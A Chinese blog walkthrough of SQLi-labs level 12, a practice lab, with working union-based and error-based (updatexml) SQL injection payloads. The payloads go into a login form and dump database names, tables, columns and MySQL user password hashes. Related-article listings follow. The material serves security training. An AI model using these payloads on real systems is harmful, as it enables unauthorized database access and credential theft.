SQLi LABS Less-12 联合注入+报错注入

已于 2024-06-23 10:33:38 修改
阅读量1.4w 收藏 2
点赞数 10
分类专栏: 《靶场实战》
于 2021-06-21 20:12:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118093164
版权

安全 网络安全 web安全

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第十二关是双引号+括号的字符型注入 , 推荐使用联合注入、报错注入。

方式一:联合注入

参考文章:联合注入使用详解 原理+步骤+实战教程

第一步、判断注入类型

用户名输入:a") or 1 -- a

密码随便输入:1,页面正常显示

用户名输入: a") or 0 -- a

密码随便输入:1,页面异常(空)显示

第二步、判断字段数

用户名依次输入:

a") order by 1 -- a

a") order by 2 -- a

a") order by 3 -- a

密码随便输入:1

 按照第三个字段排序时开始报错,确定返回结果的字段数为 3.

第三步、判断显示位

用户名输入:a") union select 1,2 -- a

密码随便输入:1

 第四步、脱库

获取所有数据库,用户名输入:

a") union select 1,(
    select group_concat(schema_name) 
    from information_schema.schemata
) -- a

密码随便输入:1

 获取 security 库的所有表,用户名输入:

a") union select 1,(
    select group_concat(table_name) 
    from information_schema.tables
    where table_schema='security'
) -- a

密码随便输入:1

 获取 users 表的所有字段,用户名输入:

a") union select 1,(
    select group_concat(column_name) 
    from information_schema.columns
    where table_schema='security' and table_name='users'
) -- a

密码随便输入:1

 获取数据库用户的密码,用户名输入:

a") union select 1,(
    select group_concat(user,password) 
    from mysql.user where user = 'mituan'
) -- a

密码随便输入:1

方式二:报错注入

参考文章:报错注入使用详解 原理+步骤+实战教程

第一步、判断是否报错

用户名输入:a"

密码随便输入:1

页面显示数据库的报错信息,适合使用报错注入。

第二步、判断报错条件

用户名输入:a") and updatexml(1,0x7e,3) -- a

密码随便输入:1

页面正常显示报错信息,确定报错函数可用。

第三步、脱库

获取所有数据库,用户名输入:

a") and updatexml(1,
	concat(0x7e,
      substr((
          select group_concat(schema_name) 
          from information_schema.schemata
      ),33,32))
,3) -- a

密码随便输入:1

 获取 security 库的所有表,用户名输入:

a") and updatexml(1,
	concat(0x7e,
		substr((
			select group_concat(table_name) 
			from information_schema.tables
        	where table_schema='security'
		)
	,1,32))
,3) -- a

密码随便输入:1

获取 users 表的所有字段,用户名输入:

a") and updatexml(1,
	concat(0x7e,
		substr((
			select group_concat(column_name) 
			from information_schema.columns
        	where table_schema='security' and table_name='users'
		)
	,1,32))
,3) -- a

密码随便输入:1

获取数据库用户的密码,用户名输入;

a") and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user where user = 'mituan'
    ))
,3) -- a

密码随便输入:1

士别三日wyx
关注
专栏目录
SQL联合注入
黑黑的小鸭的博客
08-09 2888
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4285
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs (less-12)
kukudeshuo的博客
03-09 1316
sqli-labs (less-12) 进入12关,我们发现页面和11关一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11关一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
sqli-labs less-12 post注入
最新发布
wanggonghanfei的博客
10-07 764
使用post注入通过sqli-labs十二关,使用hackbar插件
sqli-labs (less-11)
kukudeshuo的博客
03-09 2984
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqlilab学习打卡|手工注入|Less11-Less22
spring!
03-31 1162
sqlilab 通关|Less11-Less22
SQL注入】Less-11基于错误的POST单引号字符型注入
Mitchell_Donovan的博客
03-30 513
Less-11基于错误的POST单引号字符型注入 首先,这个是在用户登陆进行查询引发的post型sql注入,和get差异很大;然后我们已知其中有个用户名dumb,密码dumb;进行登陆看看! 另外本实验将会用到extractvalue()该mysql报错型函数进行sql注入;在登陆界面 输入dumb用户名 输入dumb密码 然后我们得到的拦截请求 提交post数据包uname=dumb&passwd=dumb&submit=Submit 不对它进行任何数据包修改,进行发送请求 这
SQL-libs Less-11
AgonYAN的博客
07-14 234
SQL-libs Less-11
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1339
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1562
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注
m0_54899775的博客
12-15 1223
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注 sqli-labs Less 5 sqli-labs Less 6
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2030
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
SQL注入联合注入
weixin_52281518的博客
02-03 3170
SQL注入定义 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 数据库基本操作: SQL WHERE语句:select *fr
sql注入中的联合注入
..
12-06 6548
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
Sqlilabs-12
KAKA的博客
07-07 323
这里到了 12 关,是 11 关的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是一样的。 这里仍然以 hackbar 为例构造 payload: uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.
SQL注入——联合注入
初见辉少
07-12 1037
SQL注入原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 SQL注入的本质:我们也能操作别人的数据库 数据库结构:库:就是一堆表组成的数据集合 表:类似Excel,有行和列组成的二维表 字段:表中的列称为字段 记录:表中的行称为记录 单元格:行和列相交的地方成为单元格 在数据库里有一个系统库:information_schema 在他里面有个存放所有库名的表:schemata schema_name 库名 ...
1.SQL联合注入
山兔的博客
07-31 247
安全的本质就是开发,又要懂安全又要懂开发,学安全就是开发的一些漏洞,两者相辅相成 一、SQL注入 原理:由于WEB应用程序对用户输入的数据合法性判断不严格导致。 攻击者利用现有应用程序,将恶意的SQL命令注入到程序后台并在数据库引擎执行的能力。 攻击者把SQL命令语句作为输入被服务器SQL解释器正确解析执行,数据库把查询到的结果返回给服务器,然后呈现给攻击者,攻击者由此获得数据库内的数据信息。 1.恶意请求 攻击者在正常查询请求后附加SQL语句请求至服务器(test.php?id=1 and 1=1),WE
sql注入第11关
qq_45751902的博客
03-14 4064
这关采用post的方式传参 定闭合符 使用’ or 1=1 # 回显正常 使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了) 实现原理 查询列数 ’ order by 2 # ’ order by 3 # 所以有两列 找显示位 查数据库名 'union select 1,database()# 查表名 ' union select 1,group_concat(table_name) from information_schema.tables where tab
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 421
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值